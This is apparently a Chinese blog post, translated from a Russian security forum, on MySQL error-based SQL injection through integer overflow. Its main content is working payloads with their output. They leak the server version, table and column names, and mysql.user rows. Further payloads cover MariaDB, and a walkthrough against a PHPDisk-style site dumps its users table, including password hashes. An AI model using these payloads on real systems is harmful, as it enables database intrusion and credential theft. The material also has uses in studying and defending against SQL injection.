from:https://rdot.org/forum/showthread.php?t=3167

原文是俄文,所以只能大概的翻译一下

这个报错注入主要基于Mysql的数据类型溢出(不适用于老版本的Mysql)

mysql> SELECT 18446744073709551610 * 2;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)' 

mysql> SELECT -1 * 9223372036854775808;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

下面是一些利用例

//爆数据裤版本

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610)); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))' 

// Вывод: 452 символа

//爆字段名称

mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);ERROR 

1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))' 

// Узнаем имена колонок в таблице

//爆字段值

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))' 

// Выводим данные из всех колонок сразу

既然是报错注入,就还有另外一个东西是需要我们了解一下的。那就是Mysql的报错信息的长度:

mysys/my_error.c:

/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */

#define ERRMSGSIZE      (512)

除此之外,还有一个问题需要提一下的是如果你使用的是MariaDB(Mysql的一个分之),在你试图这么做时,会发现并没有爆到想要的信息:

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

对于MariaDB我们可以去这么解决:

mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;

ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))' 

// Вывод: 475 символа

现在让我们试着缩短一下我们的Vector

//查询数据库版本

SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))

相当于

select 1E308*if((select*from(select version())x),2,2)
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

相当于

select if(x,2,2)*1E308 from(select version()x)y

//获取字段名称

SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)

相当于

select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)

//获取所有字段值

SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)

相当于

select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2)

//获取指定字段值

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

//获取字段个数

select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)

其它

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2);

    =>

    select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);

mysql> select (select * from mysql.user)=1;

    mysql> select (select * from mysql.user)in(1); 

    ERROR 1241 (21000): Operand should contain 42 column(s)

select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);

select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

select (x!=0x00)--9223372036854775808 from(SELECT version()x)y

mysql> select!x-~0.FROM(select+user()x)f;

    ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'

-------------------------------------------------

自己试了一下,发现还挺好使的 也附上吧:

假设http://example.com/file.php?id=1 此处存在SQLi,我们想证明可以获取管理员账户密码

1.先获取字段个数(在这里先用文中的方法代替,实战中由于表名是未知的,所以还是得一万个order by走起)

mysql> select * from pd_files where file_id=1 and (select 1E308*if((select*from pd_files limit 1)>(select 1),2,2)); 

ERROR 1241 (21000): Operand should contain 35 column(s)

2.确定字段个数后,老套路加新报错方法,爆出所有表

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,2 * if((SELECT * from (select group_concat(table_name) from information_schema.table_constraints where constraint_schema=database() limit 1) as `` limit 1) < (1), 18446744073709551610, 18446744073709551610); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'pd_adminsession,pd_advertisements,pd_announces,pd_buddys,pd_categories,pd_comments,pd_cp_shortcut,pd_disk2user,pd_disks,pd_extracts,pd_file2tag,pd_files,pd_folders,pd_gallery,pd_groups,pd_invitelog,pd_langs,pd_links,pd_messages,pd_navigations,pd_orders,pd_plugins,pd_replys,pd_reports,pd_search_index,pd_servers,pd_settings,pd_stats,pd_tags,pd_templates,pd_topics,pd_users' from dual limit 1) < 1),18446744073709551610,18446744073709551610))'

3.发现可疑表名pd_users,初步假设pd_users为管理员表名。爆出该表所有字段:

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,1E308*if((select*from(select*from pd_users)``limit 1)>(select*from pd_users limit 1),2,2); 

ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if(((select `userid`,`username`,`password`,`email`,`gid`,`reset_code`,`is_activated`,`is_locked`,`last_login_time`,`last_login_ip`,`reg_time`,`reg_ip`,`credit`,`wealth`,`rank`,`exp`,`accept_pm`,`show_email`,`space_pos`,`user_file_types`,`user_store_space`,`user_rent_space`,`space_day_credits`,`down_flow_count`,`view_flow_count`,`flow_reset_time`,`max_flow_down`,`max_flow_view` from (select `phpdisk`.`pd_users`.`userid` AS `userid`,`phpdisk`.`pd_users`.`username` AS

4.获取关键字段值:

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,1E308*if((select username||password from(select*from pd_users LIMIT 1)a limit 1),2,2); 

ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if((select ('xsstest2<a>a' or '"xss123\'/') from dual limit 1),2,2))'

最后再验证一下

mysql> select username,password from pd_users;

+--------------+----------------------------------+

| username     | password                         |

+--------------+----------------------------------+

| xsstest2<a>a | "xss123\'/                       |

| phpdisk_demo | fcf41657f02f88137a1bcf068a32c0a3 |

| xsstest      | 44b22f2bf7c7cfa05c351a5bf228fee0 |

+--------------+----------------------------------+

3 rows in set (0.00 sec)

又一种Mysql报错注入的更多相关文章

  1. SQL注入之Mysql报错注入

    --志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...

  2. Mysql报错注入原理分析(count()、rand()、group by)

    Mysql报错注入原理分析(count().rand().group by) 0x00 疑问 一直在用mysql数据库报错注入方法,但为何会报错? 百度谷歌知乎了一番,发现大家都是把官网的结论发一下截 ...

  3. SQL注入之MySQL报错注入整理

    看大佬们的文章看得我虎躯一震,精神抖擞,于是心血来潮,整理一下MySQL报错注入常见的手段和方法,再举几个例子 <代码审计:企业级Web代码安全架构>一书中介绍过报错注入十大方法,依次是: ...

  4. mysql报错注入手工方法

    以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过.这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩 ...

  5. 【菜鸟学注入】之MySQL报错注入详解

    本文转自:http://bbs.blackbap.org/forum.php?mod=viewthread&tid=6483&highlight=mysql%2B报错注入 用SQL注入 ...

  6. MySQL报错注入总结

    mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法. 报错注入: ...

  7. MySQL报错注入函数汇总及常用注入语句

    版权声明:本文转载自网络内容,下面附原创链接原创链接:https://blog.csdn.net/Auuuuuuuu/article/details/91415165 常用函数 字符串连接函数,将多个 ...

  8. Mysql报错注入之floor报错详解

    一.简述 利用 select count(*),(floor(rand(0)*2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor ...

  9. 学习笔记 MYSQL报错注入(count()、rand()、group by)

    首先看下常见的攻击载荷,如下: select count(*),(floor(rand(0)*2))x from table group by x; 然后对于攻击载荷进行解释, floor(rand( ...

随机推荐

  1. scrapy爬虫成长日记之将抓取内容写入mysql数据库

    前面小试了一下scrapy抓取博客园的博客(您可在此查看scrapy爬虫成长日记之创建工程-抽取数据-保存为json格式的数据),但是前面抓取的数据时保存为json格式的文本文件中的.这很显然不满足我 ...

  2. canvas API ,通俗的canvas基础知识(五)

    前几期讲的都是路径图形的绘图,这节我们要讲的是如何在画布上操作图片,因为图形画不了漂亮妹子(画图高手忽略不计),想画美女怎么办?跟我来: 想要在画布中插入一张图片,我们需要的方法是这位大侠: draw ...

  3. poj 2739 Sum of Consecutive Prime Numbers 解题报告

    题目链接:http://poj.org/problem?id=2739 预处理出所有10001以内的素数,按照递增顺序存入数组prime[1...total].然后依次处理每个测试数据.采用双重循环计 ...

  4. codeforces B.Maximum Absurdity 解题报告

    题目链接:http://codeforces.com/contest/332/problem/B 题意:在一个序列中,在所有长度为k的区间里找出两个不重叠的最大和,输出这两个最大和所对应的开头的位置a ...

  5. Android之ScrollView

    1.ScrollView和HorizontalScrollView是为控件或者布局添加滚动条 2.上述两个控件只能有一个孩子,但是它并不是传统意义上的容器 3.上述两个控件可以互相嵌套 4.滚动条的位 ...

  6. SQL 总汇

    /* 启动MySQL */ net start mysql /* 连接与断开服务器 */ mysql -h 地址 -P 端口 -u 用户名 -p 密码 /* 跳过权限验证登录MySQL */ mysq ...

  7. 今天装了一个RTI工具

    就是一个协议,需要在本机运行,今天天气有变,还要陈到家里来安装光纤宽带,昨天晚上家里下了一场雷电交加的大雨,电停了一会

  8. .net学习笔记----Asp.net的生命周期之一应用程序生命周期

    Http请求刚刚到达服务器的时候 当服务器接收到一个 Http请求的时候,IIS (Internet Information Services,互联网信息服务)首先需要决定如何去处理这个请求. 什么是 ...

  9. Android 开发 --Unable to resolve target 'android-19'

    Android 开发 --Unable to resolve target 'android-19' http://blog.csdn.net/love_javc_you/article/detail ...

  10. 在Android4.4上新增加keycode

    keycode是android定义好的,但是有时候无法满足需要,进行定制化难免会涉及到新增加keycode.分成两部分,驱动和framework,这里主要讲解framework部分: 一.驱动部分: ...